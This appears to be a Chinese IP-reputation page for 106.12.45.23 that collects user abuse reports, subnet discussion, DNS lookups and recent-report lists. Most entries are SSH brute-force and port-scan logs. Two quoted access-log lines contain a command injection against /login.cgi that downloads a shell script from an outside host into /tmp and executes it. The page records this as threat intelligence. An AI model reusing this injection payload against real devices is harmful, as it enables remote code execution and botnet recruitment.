106.12.45.23 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): Beijing Baidu Netcom Science and Technology Co. Ltd.

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Search Engine Spider

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attack	MultiHost/MultiPort Probe, Scan, Hack -	2019-07-18 19:15:48
attack	106.12.45.23 - - [17/Jul/2019:18:24:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ...	2019-07-18 07:08:31
attackspambots	106.12.45.23 - - [11/Jul/2019:05:58:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ...	2019-07-11 14:03:00
attack	firewall-block_invalid_GET_Request	2019-07-05 09:17:38
attackspambots	scan z	2019-06-26 02:05:51

相同子网IP讨论:

IP	类型	评论内容	时间
106.12.45.32	attackspam	Sep 20 06:01:31 s158375 sshd[25400]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.32	2020-09-20 21:37:09
106.12.45.32	attackspambots	firewall-block, port(s): 21513/tcp	2020-09-20 13:31:50
106.12.45.32	attackspam	Port scan: Attack repeated for 24 hours	2020-09-20 05:31:27
106.12.45.110	attack	Sep 14 04:48:16 cho sshd[2864902]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 14 04:48:16 cho sshd[2864902]: Invalid user kawarada from 106.12.45.110 port 48496 Sep 14 04:48:18 cho sshd[2864902]: Failed password for invalid user kawarada from 106.12.45.110 port 48496 ssh2 Sep 14 04:49:59 cho sshd[2864959]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root Sep 14 04:50:01 cho sshd[2864959]: Failed password for root from 106.12.45.110 port 40780 ssh2 ...	2020-09-14 17:28:18
106.12.45.110	attack	2020-09-13T13:58:31.788689yoshi.linuxbox.ninja sshd[3254858]: Failed password for root from 106.12.45.110 port 35694 ssh2 2020-09-13T14:00:43.409872yoshi.linuxbox.ninja sshd[3256329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root 2020-09-13T14:00:45.844988yoshi.linuxbox.ninja sshd[3256329]: Failed password for root from 106.12.45.110 port 38064 ssh2 ...	2020-09-14 03:14:29
106.12.45.110	attack	Sep 13 01:05:59 web1 sshd\[23350\]: Invalid user ubnt from 106.12.45.110 Sep 13 01:05:59 web1 sshd\[23350\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 13 01:06:01 web1 sshd\[23350\]: Failed password for invalid user ubnt from 106.12.45.110 port 50406 ssh2 Sep 13 01:12:24 web1 sshd\[23888\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root Sep 13 01:12:25 web1 sshd\[23888\]: Failed password for root from 106.12.45.110 port 55278 ssh2	2020-09-13 19:13:02
106.12.45.110	attackbots	Sep 10 10:17:48 vps46666688 sshd[19570]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 10 10:17:49 vps46666688 sshd[19570]: Failed password for invalid user gentry from 106.12.45.110 port 58934 ssh2 ...	2020-09-10 23:56:32
106.12.45.110	attackspambots	Sep 10 07:10:55 jumpserver sshd[17533]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 10 07:10:55 jumpserver sshd[17533]: Invalid user rtkit from 106.12.45.110 port 53434 Sep 10 07:10:57 jumpserver sshd[17533]: Failed password for invalid user rtkit from 106.12.45.110 port 53434 ssh2 ...	2020-09-10 15:21:09
106.12.45.110	attackspambots	Sep 9 21:10:43 mout sshd[20456]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root Sep 9 21:10:44 mout sshd[20456]: Failed password for root from 106.12.45.110 port 58562 ssh2	2020-09-10 05:57:23
106.12.45.32	attackbotsspam	firewall-block, port(s): 2167/tcp	2020-09-08 00:16:42
106.12.45.32	attackbots	ET CINS Active Threat Intelligence Poor Reputation IP group 97 - port: 2167 proto: tcp cat: Misc Attackbytes: 60	2020-09-07 15:48:38
106.12.45.32	attackspam	Port Scan ...	2020-09-07 08:10:34
106.12.45.110	attack	Sep 1 05:50:14 ns382633 sshd\[5643\]: Invalid user test from 106.12.45.110 port 42682 Sep 1 05:50:14 ns382633 sshd\[5643\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 1 05:50:16 ns382633 sshd\[5643\]: Failed password for invalid user test from 106.12.45.110 port 42682 ssh2 Sep 1 05:54:16 ns382633 sshd\[5932\]: Invalid user tom from 106.12.45.110 port 58056 Sep 1 05:54:16 ns382633 sshd\[5932\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110	2020-09-01 13:49:33
106.12.45.110	attackbots	Aug 31 15:03:41 abendstille sshd\[6274\]: Invalid user atul from 106.12.45.110 Aug 31 15:03:41 abendstille sshd\[6274\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Aug 31 15:03:44 abendstille sshd\[6274\]: Failed password for invalid user atul from 106.12.45.110 port 35992 ssh2 Aug 31 15:07:37 abendstille sshd\[10099\]: Invalid user xavier from 106.12.45.110 Aug 31 15:07:37 abendstille sshd\[10099\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 ...	2020-08-31 23:08:27
106.12.45.32	attackspam	Port scan denied	2020-08-30 03:08:46

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 106.12.45.23
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 29902
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;106.12.45.23.			IN	A

;; AUTHORITY SECTION:
.			2099	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019062501 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Wed Jun 26 02:05:43 CST 2019
;; MSG SIZE  rcvd: 116

HOST信息:

Host 23.45.12.106.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		67.207.67.2
Address:	67.207.67.2#53

** server can't find 23.45.12.106.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
74.120.14.27	attackbotsspam	Telnet/23 MH Probe, Scan, BF, Hack -	2020-09-28 15:29:54
192.241.219.226	attackspam	Port scan denied	2020-09-28 15:06:20
213.158.29.179	attackspam	2020-09-27 21:05:25.506180-0500 localhost sshd[15759]: Failed password for root from 213.158.29.179 port 46280 ssh2	2020-09-28 15:30:09
185.176.27.230	attackspam	ET DROP Dshield Block Listed Source group 1 - port: 2184 proto: tcp cat: Misc Attackbytes: 60	2020-09-28 15:31:49
192.241.223.72	attackspam	Port scan denied	2020-09-28 15:11:05
125.212.217.214	attack	firewall-block, port(s): 8766/tcp	2020-09-28 15:33:47
138.68.80.235	attack	xmlrpc attack	2020-09-28 15:23:17
112.85.42.122	attack	Sep 28 16:34:04 web1 sshd[7862]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.122 user=root Sep 28 16:34:06 web1 sshd[7862]: Failed password for root from 112.85.42.122 port 45718 ssh2 Sep 28 16:34:04 web1 sshd[7860]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.122 user=root Sep 28 16:34:06 web1 sshd[7860]: Failed password for root from 112.85.42.122 port 48448 ssh2 Sep 28 16:34:04 web1 sshd[7862]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.122 user=root Sep 28 16:34:06 web1 sshd[7862]: Failed password for root from 112.85.42.122 port 45718 ssh2 Sep 28 16:34:09 web1 sshd[7862]: Failed password for root from 112.85.42.122 port 45718 ssh2 Sep 28 16:34:04 web1 sshd[7862]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.122 user=root Sep 28 16:34:06 web1 sshd[7862]: Failed pass ...	2020-09-28 15:12:18
45.6.24.24	attackspambots	SSH/22 MH Probe, BF, Hack -	2020-09-28 15:17:32
149.56.45.139	attackbots	Sep 28 06:53:49 sip sshd[1755536]: Invalid user trade from 149.56.45.139 port 56408 Sep 28 06:53:50 sip sshd[1755536]: Failed password for invalid user trade from 149.56.45.139 port 56408 ssh2 Sep 28 07:01:30 sip sshd[1755555]: Invalid user office from 149.56.45.139 port 39434 ...	2020-09-28 15:21:26
206.189.143.91	attackbotsspam	Sep 28 07:26:10 nopemail auth.info sshd[2606]: Invalid user bh from 206.189.143.91 port 60290 ...	2020-09-28 15:13:32
79.153.177.145	attackbotsspam	Unauthorized connection attempt from IP address 79.153.177.145 on port 3389	2020-09-28 15:36:41
54.39.189.118	attackspambots	54.39.189.118 - - [28/Sep/2020:08:43:34 +0200] "GET /wp-login.php HTTP/1.1" 200 8558 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 54.39.189.118 - - [28/Sep/2020:08:43:36 +0200] "POST /wp-login.php HTTP/1.1" 200 8809 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 54.39.189.118 - - [28/Sep/2020:08:43:37 +0200] "POST /xmlrpc.php HTTP/1.1" 200 427 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"	2020-09-28 14:52:43
129.211.124.120	attack	Sep 28 05:13:43 staging sshd[128079]: Invalid user oracle from 129.211.124.120 port 48210 Sep 28 05:13:43 staging sshd[128079]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.211.124.120 Sep 28 05:13:43 staging sshd[128079]: Invalid user oracle from 129.211.124.120 port 48210 Sep 28 05:13:45 staging sshd[128079]: Failed password for invalid user oracle from 129.211.124.120 port 48210 ssh2 ...	2020-09-28 15:33:08
175.123.253.79	attack	Sep 28 02:59:12 ws22vmsma01 sshd[65329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=175.123.253.79 Sep 28 02:59:14 ws22vmsma01 sshd[65329]: Failed password for invalid user ts3 from 175.123.253.79 port 47214 ssh2 ...	2020-09-28 15:37:12

最近上报的IP列表

113.121.240.246	196.64.167.5	180.120.192.147	198.143.179.66
95.177.162.153	159.100.24.10	62.133.162.255	114.232.219.221
42.110.202.227	121.226.127.171	195.189.141.50	121.226.62.147
188.166.254.118	202.254.236.13	172.104.172.12	37.142.4.186
192.145.239.52	80.211.3.175	52.249.205.53	93.65.245.164